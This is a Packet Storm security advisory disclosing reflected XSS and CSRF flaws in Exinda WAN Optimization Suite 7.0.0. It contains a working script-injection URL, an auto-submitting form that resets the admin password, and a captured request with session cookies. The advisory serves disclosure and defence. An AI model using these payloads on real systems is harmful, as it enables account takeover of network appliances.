exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Exinda WAN Optimization Suite 7.0.0 CSRF / XSS

Exinda WAN Optimization Suite 7.0.0 CSRF / XSS
Posted Sep 27, 2014
Authored by William Costa

Exinda WAN Optimization Suite version 7.0.0 (2160) suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
advisories | CVE-2014-7157, CVE-2014-7158
SHA-256 | 83a1c7b092131f1cef204e879001c5cba65704e647207c15e65081dd1833f4a3

Exinda WAN Optimization Suite 7.0.0 CSRF / XSS

Change Mirror Download
I. VULNERABILITY

-------------------------

XSS Reflected vulnerabilities and CSRF in Exinda WAN Optimization Suite

II. BACKGROUND
-------------------------
WAN Optimization Suite integrates enterprise-caliber bandwidth acceleration
and optimization with best-in-class application network visibility and
control in a single, easy-to-use suite - See more at:

III. DESCRIPTION
-------------------------
Has been detected a XSS Reflected vulnerability in Exinda Wan Optimization
"/admin/launch?script=rh&template=sys-users&tabsel=" parameter “tabsel” in
version v7.0.0 (2160), that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser. This may
allow a remote attacker to be able to forge requests that Exinda takes
action upon.

IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “tabsel” in "
https://demo-nam-01.exinda.com:42818/admin/launch?script=rh&template=sys-
users&tabsel=aaa"><script>alert("Exinda XSS")</script>

POC CSRF
<html>

<body onload="CSRF.submit();">

<form id="CSRF" action="https://demo-nam-
02.exinda.com:34896/admin/launch?script=rh&template=sys-
users&tabsel=localusers" method="post" name="CSRF"> <input name="action10"
value="password_exinda"> </input> <input name="d_account=" value="account">
</input> <input name="t_account" value="string"> </input>

<input name="c_account" value="string"> </input> <input name="e_account"
value="true"> </input> <input name="f_account" value="admin"> </input>
<input name="d_password" value="password"> </input> <input
name="c_password" value="-"> </input>

<input name="m_password" value="false"> </input> <input name="e_password"
value="true"> </input> <input name="f_password" value="123456"> </input>
<input name="d_confirm" value="confirm"> </input> <input name="c_confirm"
value="-"> </input>
<input name="m_confirm" value="false"> </input> <input name="e_confirm"
value="true"> </input>
<input name="f_confirm" value="123456"> </input> <input name="apply"
value="Change+Password"> </input> </form>

</body>
</html>

Host=demo-nam-02.exinda.com:34896
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
Gecko/20100101 Firefox/32.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding=gzip,
deflate Referer=https://10.0.1.120/exinda/csrf.php
Cookie=resolutionconfig=today; _mkto_trk=id:316-TKO-387&token:_mch-
exinda.com-1411601373982-94280;
__utma=217124611.1138601206.1411601386.1411601386.1411601386.1;
__utmb=217124611.6.9.1411601437592; __utmc=217124611;
__utmz=217124611.1411601386.1.1.utmcsr=demo.exinda.com|utmccn=(referra
l)|utmcmd=referral|utmcct=/launch.php; iframe=yes;
session=IGQYEA1Jo1%2bOiMFK5%2b1joDCh60VoGvzrLqGJ%2bfF1Q1VCAAE%3d;
SDPSession=9b1195d97d796f12d828a2acd5801718fb152e1b0e3f194ace21529571c
41f8f; user_email=admin; first%5flogin=false; st_index=1411531200;
et_index=1411617600; lastConfigurationPage=https%3A%2F%2Fdemo-nam-
02.exinda.com%3A34896%2Fadmin%2Flaunch%3Fscript%3Drh%26template%3Dsys-
users%26tabsel%3Dlocalusers
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=300

POSTDATA=action10=password_exinda&d_account%3D=account&t_account=strin
g&c_account=string&e_account=true&f_account=admin&d_password=password&
c_password=-
&m_password=false&e_password=true&f_password=123456&d_confirm=confirm&c_confirm=-
&m_confirm=false&e_confirm=true&f_confirm=123456&apply=Change%2BPasswo rd

V. BUSINESS IMPACT -------------------------

Vulnerability allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser and change password of
admin user without consentiment.

VI. REQUIREMENTS
-----------------------
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.

VII. SYSTEMS AFFECTED
-------------------------
Try Exinda WAN Optimization Suite v7.0.0 (2160)

VIII. SOLUTION
-------------------------
All parameter must be validated and use of token csrf


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close